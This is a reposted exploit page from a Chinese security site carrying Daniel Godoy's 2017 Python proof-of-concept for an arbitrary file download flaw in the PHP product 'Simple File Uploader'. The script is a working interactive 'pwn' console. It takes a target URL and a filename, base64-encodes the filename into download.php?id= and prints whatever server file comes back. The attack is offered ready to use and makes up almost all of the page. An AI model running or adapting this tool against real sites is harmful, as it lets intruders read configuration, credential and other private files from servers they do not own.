Simple File Uploader - Arbitrary File Download

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Simple File Uploader - Arbitrary File Download

来源：https://pastebin.com/HeT7RuRU 作者：Godoy 发布时间：2017-04-28

# Exploit Title: Simple File Uploader - Arbitrary File Download
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team

POC

#!/usr/bin/env python
#https://pastebin.com/HeT7RuRU
import os,re,requests,time,base64
os.system('clear')

BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
CYAN = "\033[96m"
WHITE = "\033[97m"
YELLOW = "\033[93m"
MAGENTA = "\033[95m"
GREY = "\033[90m"
DEFAULT = "\033[0m"

def banner():
    print WHITE+""
    print "                                              ##          ## "
    print "                                                ##      ##    "
    print "                                              ############## "
    print "                                            #### ###### #### "
    print "                                          ###################### "
    print "                                          ## ############## ##     "
    print "                                          ## ##          ## ## "
    print "                                                #### ####"
    print ""

def details():
    print WHITE+"                              =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "
    print ""

def core_commands():
    os.system('clear')
    print WHITE+'''Core Commands\n===============\n
Command\t\t\tDescription\n-------\t\t\t-----------\n
?\t\t\tHelp menu
quit\t\t\tExit the console
info\t\t\tDisplay information
download\t\t\tExploit Vulnerability

    '''

def about():
    os.system('clear')
    print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n
Author\t\t\tDescription\n-------\t\t\t-----------\n
Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146
    '''

def download():
    other = 'a'
    while other != 'n':
            urltarget = str(raw_input(WHITE+'Target: '))
            filename = str(raw_input(WHITE+'FileName: '))
            filename = base64.b64encode(filename)
            print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename
            final = urltarget+'download.php?id='+filename
            r = requests.get(final)
            print r.text
            other = str(raw_input(WHITE+'Test other file? y/n: '))
            if other == "n":
                print "Type quit to exit. Bye!"

banner()
details()

option='0'
while option != 0:
    option = (raw_input(RED+"pwn" + WHITE +" > "))
    if option == "quit":
        os.system('clear')
        option = 0
    elif option == "?":
        core_commands()
    elif option == "help":
        core_commands()
    elif option == "about":
        about()
    elif option == "download":
        download()
    elif option == "info":
        about()
    else:
        print "Not a valid option! Need help? Press ? to display core commands " +GREEN

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告